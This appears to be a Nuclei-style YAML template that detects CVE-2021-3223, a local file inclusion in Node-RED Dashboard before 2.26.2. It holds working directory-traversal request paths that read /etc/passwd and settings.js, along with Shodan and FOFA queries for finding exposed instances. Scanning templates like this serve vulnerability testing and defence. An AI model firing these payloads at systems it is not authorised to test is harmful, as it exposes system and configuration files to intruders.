id: CVE-2021-3223

info:
  name: Node RED Dashboard <2.26.2 - Local File Inclusion
  author: gy741,pikpikcu
  severity: high
  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
  reference:
    - https://github.com/node-red/node-red-dashboard/issues/669
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3223
    cwe-id: CWE-22
    epss-score: 0.15641
    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
    epss-percentile: 0.95204
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Node-RED"
    fofa-query: title="Node-RED"
    framework: node.js
    vendor: nodered
    product: node-red-dashboard
  tags: cve,cve2021,node-red-dashboard,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED web server is listening"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"